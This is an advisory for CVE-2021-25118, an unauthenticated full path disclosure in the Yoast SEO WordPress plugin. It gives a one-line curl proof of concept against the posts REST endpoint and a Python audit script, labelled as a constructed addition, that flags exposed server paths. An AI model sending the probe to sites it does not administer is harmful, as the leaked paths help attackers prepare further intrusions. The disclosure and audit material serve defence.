[CVE-2021-25118] Yoast SEO 16.7-17.2 - Unauthenticated Full Path Disclosure

Description

The Yoast SEO WordPress plugin, from versions 16.7 until 17.2, discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints. This could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.

Proof of Concept

curl -s 'https://example.com/wp-json/wp/v2/posts?per_page=1' | jq '.[0].yoast_head_json.og_image[0].path'
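To audit a site you administer for this disclosure across every returned post rather than only the first, the check below parses a saved wp/v2/posts response and reports each og_image entry whose path field holds an absolute filesystem path. It is an added example, not part of the original advisory or the plugin's code; the function name find_disclosed_paths and the sample response are constructed for illustration.

```python
import json
import re

# Constructed sample of a wp/v2/posts response (not captured from a real site).
SAMPLE_RESPONSE = json.dumps([
    {"id": 1, "yoast_head_json": {"og_image": [
        {"url": "https://example.com/wp-content/uploads/a.jpg",
         "path": "/var/www/html/wp-content/uploads/a.jpg", "width": 1200}]}},
    {"id": 2, "yoast_head_json": {"og_image": [
        {"url": "https://example.com/wp-content/uploads/b.jpg", "width": 800}]}},
    {"id": 3, "yoast_head_json": {}},   # SEO data present, no featured image
    {"id": 4},                          # post without Yoast data
    {"id": 5, "yoast_head_json": {"og_image": [
        {"url": "https://example.com/wp-content/uploads/c.jpg",
         "path": "C:\\inetpub\\wwwroot\\wp-content\\uploads\\c.jpg"}]}},
])

# Absolute POSIX path, Windows drive-letter path, or UNC path.
ABSOLUTE_PATH = re.compile(r"^(/|[A-Za-z]:[\\/]|\\\\)")


def find_disclosed_paths(response_text):
    """Return (post_id, image_index, path) for each og_image entry exposing a server path."""
    posts = json.loads(response_text)
    if not isinstance(posts, list):     # a single-post endpoint returns one object
        posts = [posts]
    findings = []
    for post in posts:
        if not isinstance(post, dict):
            continue
        head = post.get("yoast_head_json")
        if not isinstance(head, dict):
            continue
        images = head.get("og_image") or []
        if not isinstance(images, list):
            continue
        for idx, image in enumerate(images):
            path = image.get("path") if isinstance(image, dict) else None
            if isinstance(path, str) and ABSOLUTE_PATH.match(path):
                findings.append((post.get("id"), idx, path))
    return findings


if __name__ == "__main__":
    for post_id, idx, path in find_disclosed_paths(SAMPLE_RESPONSE):
        print(f"post {post_id} og_image[{idx}] exposes {path}")
```

An empty result on a response that does contain og_image entries indicates the path field is no longer being served.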

References